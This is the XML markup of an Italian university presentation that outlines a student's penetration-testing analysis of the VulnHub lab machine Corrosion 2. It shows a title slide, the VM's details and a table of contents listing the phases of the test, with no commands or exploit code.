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9" r:id="rId1"/>
  </p:sld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79" r:id="rId20"/>
    <p:sldId id="281" r:id="rId21"/>
    <p:sldId id="283" r:id="rId22"/>
    <p:sldId id="284" r:id="rId23"/>
    <p:sldId id="285" r:id="rId24"/>
    <p:sldId id="282" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="287" r:id="rId27"/>
    <p:sldId id="288" r:id="rId28"/>
    <p:sldId id="289" r:id="rId29"/>
    <p:sldId id="291" r:id="rId30"/>
    <p:sldId id="290" r:id="rId31"/>
    <p:sldId id="292" r:id="rId32"/>
    <p:sldId id="293" r:id="rId33"/>
    <p:sldId id="294" r:id="rId34"/>
    <p:sldId id="304" r:id="rId35"/>
    <p:sldId id="305" r:id="rId36"/>
    <p:sldId id="295" r:id="rId37"/>
    <p:sldId id="296" r:id="rId38"/>
    <p:sldId id="297" r:id="rId39"/>
    <p:sldId id="298" r:id="rId40"/>
    <p:sldId id="299" r:id="rId41"/>
    <p:sldId id="300" r:id="rId42"/>
    <p:sldId id="302" r:id="rId43"/>
    <p:sldId id="303" r:id="rId44"/>
    <p:sldId id="306" r:id="rId45"/>
    <p:sldId id="308" r:id="rId46"/>
    <p:sldId id="307" r:id="rId47"/>
    <p:sldId id="309" r:id="rId48"/>
    <p:sldId id="310" r:id="rId49"/>
    <p:sldId id="311" r:id="rId50"/>
    <p:sldId id="313" r:id="rId5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52E"/>
    <a:srgbClr val="4472C4"/>
    <a:srgbClr val="E9E7E7"/>
    <a:srgbClr val="254687"/>
    <a:srgbClr val="1A3260"/>
    <a:srgbClr val="3F84A7"/>
    <a:srgbClr val="28526A"/>
    <a:srgbClr val="D5DFF3"/>
    <a:srgbClr val="99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7" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="121" d="100"/>
          <a:sy n="121" d="100"/>
        </p:scale>
        <p:origin x="523" y="11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35E565-E1D6-5BB2-8F8F-491EA43C2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A72D0C-5C2A-E961-92A2-D651CD409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27A54F-80B2-CBFB-1992-10910966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A63E-E524-4550-A96D-0A7357FBE640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BD0F8B-CD41-5CA5-5F1E-447B29E1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B93FC8-544F-0F20-47CB-371B66BE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E805-3ACA-4C8F-83EA-7E0DCD30E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664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892562-DBDD-D8B5-CC86-660BE9DF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50F78D7-3609-1B65-5235-E1AAE7231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8954DF-74E6-CDC9-0DBF-B189F211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A63E-E524-4550-A96D-0A7357FBE640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AD4B32-1305-ED88-0365-F07EA991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8A040E-E946-C892-B1CA-C1748A48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E805-3ACA-4C8F-83EA-7E0DCD30E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15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E1F29E6-E7FE-DFCC-4028-C5E5D161A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4CC214-3C3A-B740-A9E3-0DC6E8176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BECCD9-E6BB-0E8F-C826-9C210AC5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A63E-E524-4550-A96D-0A7357FBE640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0A09F5-3A19-119A-DB6D-87873A8A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810068-04EA-334B-FEF5-47C4AFC3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E805-3ACA-4C8F-83EA-7E0DCD30E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460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EF1388-BE58-BFC0-A9C8-60330547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693889-CDF9-342B-12CD-5BE8E1EF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CAEF3A-D7B4-2A38-0AB3-9CC04C0F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A63E-E524-4550-A96D-0A7357FBE640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3EBEAB-04C2-8B75-7ADF-DE2B78B0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F386E3-3DE0-8DBA-A48A-CC021C51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E805-3ACA-4C8F-83EA-7E0DCD30E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11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D93948-C072-FA5B-2899-AEABBF65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464130-0AA0-DEDC-E206-05494220F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0FFE9D-DD75-DDB7-2830-90C66810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A63E-E524-4550-A96D-0A7357FBE640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18D601-DCDA-A2F9-D7B3-0A490F7A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AA2755-5007-62A9-A7CD-BF2B954D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E805-3ACA-4C8F-83EA-7E0DCD30E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228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9438DF-FA46-A9E6-9851-B1F70521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477F41-E71F-6C6C-3F66-E99EBBB2F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51D406-D55C-2883-76BE-6E1A4B48C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5FA603-F4B9-9FA5-A58E-B56C1497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A63E-E524-4550-A96D-0A7357FBE640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CA811F-0F02-422B-1C53-C2247DED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418C4A-4733-394C-1680-12231BAB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E805-3ACA-4C8F-83EA-7E0DCD30E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444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1AE5DF-95FA-E99F-12FB-559B39BF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6EF5B5-3FCE-11A1-A46E-65C010FE5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C27A79-98F2-01BC-9756-8B35CED78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B2D28B3-89E8-B80C-267E-1F4BCA95B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339705-9926-9BD5-58CE-7FC14B315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FAF6906-F6A0-B6D1-DDCB-606CDF72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A63E-E524-4550-A96D-0A7357FBE640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670DA6D-C8A5-205B-39F2-8028D990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C8FCD4C-A6FA-7116-2104-5C1A090E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E805-3ACA-4C8F-83EA-7E0DCD30E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96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627702-B59B-6ED1-5FFB-5DFF6BE0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9D6560C-294A-95C7-A273-741D6A98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A63E-E524-4550-A96D-0A7357FBE640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312BF3-B1E8-DEBC-9DB0-C90632E3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D56A2BF-5EDE-013D-7DC2-9A8F2A6C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E805-3ACA-4C8F-83EA-7E0DCD30E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05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8B9883-5219-EB5A-2C4C-E31CB192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A63E-E524-4550-A96D-0A7357FBE640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56BE46-69BC-6C1B-865B-5B7ABCBF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3203C6-46A7-4066-A69E-068C1AC8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E805-3ACA-4C8F-83EA-7E0DCD30E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65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A9AE8-AC0B-CCB8-7D8B-9A8176BB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A20F88-C6A8-3457-E716-D4551AE32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E4E094-2DA0-684E-9319-A4C271E52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D00FB5-B066-4344-9D26-51DE4DA9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A63E-E524-4550-A96D-0A7357FBE640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11DD04-A9B7-6F77-8646-2FA8CFCC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530830-57E2-2E4B-1315-11A149CD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E805-3ACA-4C8F-83EA-7E0DCD30E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224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1BC734-E62E-FE45-86F7-D4E6AFF9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9472D2-3EAE-099C-D6FA-1677ACC3A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AE96B35-9D0E-6D3F-563E-EB0C79906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CEDB66-DD49-D00C-F5EA-630F514A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A63E-E524-4550-A96D-0A7357FBE640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F1E002-8B74-BC8A-BB3A-6ED12849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181685-B65A-A6F3-FBDF-FC13F2ED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E805-3ACA-4C8F-83EA-7E0DCD30E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70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7D33BDA-6A82-0B2C-E3A8-A77B616A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70EE6B-3DDB-7C7F-D065-E0B49C925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B6AE46-5D58-14C7-496E-B68E6FA8D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A63E-E524-4550-A96D-0A7357FBE640}" type="datetimeFigureOut">
              <a:rPr lang="it-IT" smtClean="0"/>
              <a:t>18/07/2023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A490D2-2A83-A4B4-3343-84F6084B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EF9713-8AEC-F9A0-6ED3-4E953308C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DE805-3ACA-4C8F-83EA-7E0DCD30EB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576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48" r:id="rId9"/>
    <p:sldLayoutId id="2147484249" r:id="rId10"/>
    <p:sldLayoutId id="21474842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311CE5-3D05-493E-B9D2-CF549DF73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DF687B-70CA-0A5A-5AA9-65F6CB3D31F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3996407"/>
            <a:ext cx="12188952" cy="1109031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Penetration Testing &amp; Ethical hacking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19EF076-97F8-3236-3304-48B66DC2C540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1007225" y="5004042"/>
            <a:ext cx="10191405" cy="54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400" kern="1200" cap="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Analisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="12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2400" kern="1200" cap="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della</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="12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2400" kern="1200" cap="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macchina</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="12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CORROSION: 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D56F2A1-9E51-D9B1-6994-A5904591E2A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1978034" y="6028015"/>
            <a:ext cx="306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Studente: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-I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Federico De Mattia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487EBC7-94C3-BD50-170E-BDD5386D3B82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7153100" y="6028015"/>
            <a:ext cx="351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Docente: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-I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Arcangelo Castiglione</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Immagine 31" descr="Immagine che contiene spazio, stella, web">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4891E50-4E66-80C8-DED2-4B7D659F1C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9" b="19161"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1252564" y="572626"/>
            <a:ext cx="9683821" cy="3626138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150"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805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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="325204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Information Gathering</a:t>
            </a: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979B1A2-164D-B8EA-C1CB-0CA455AF57AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923607" y="1872595"/>
            <a:ext cx="7028286" cy="364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n-lt"/>
              </a:rPr>
              <a:t>Informazioni fornite dall’autore della macchina virtuale, riportate sulla pagina di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>VulnHub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: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n-lt"/>
              </a:rPr>
              <a:t>Formato: Macchina virtuale (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Virtualbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> - OVA)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n-lt"/>
              </a:rPr>
              <a:t>Sistema operativo: Linux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n-lt"/>
              </a:rPr>
              <a:t>Servizio DHCP: Abilitato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n-lt"/>
              </a:rPr>
              <a:t>Indirizzo IP: Assegnazione automatica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n-lt"/>
              </a:rPr>
              <a:t>Sono presenti due </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>screenshot</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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0" name="Picture 2" descr="Corrosion 2 screenshot">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2452509-E3D2-7F1D-D4D1-B5EBB181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77" y="1872595"/>
            <a:ext cx="1905000" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="4472C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rrosion 2 screenshot">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14AFD3BE-F96F-D9FF-3269-5035F4DA3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77" y="4090901"/>
            <a:ext cx="1905000" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="4472C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94333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1A3260"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="25468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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="889533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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="614266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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665"/>
            <a:ext cx="2611973" cy="236512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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="136095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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="134817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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="2300961"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4472C4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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Scoping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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT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Gathering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Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
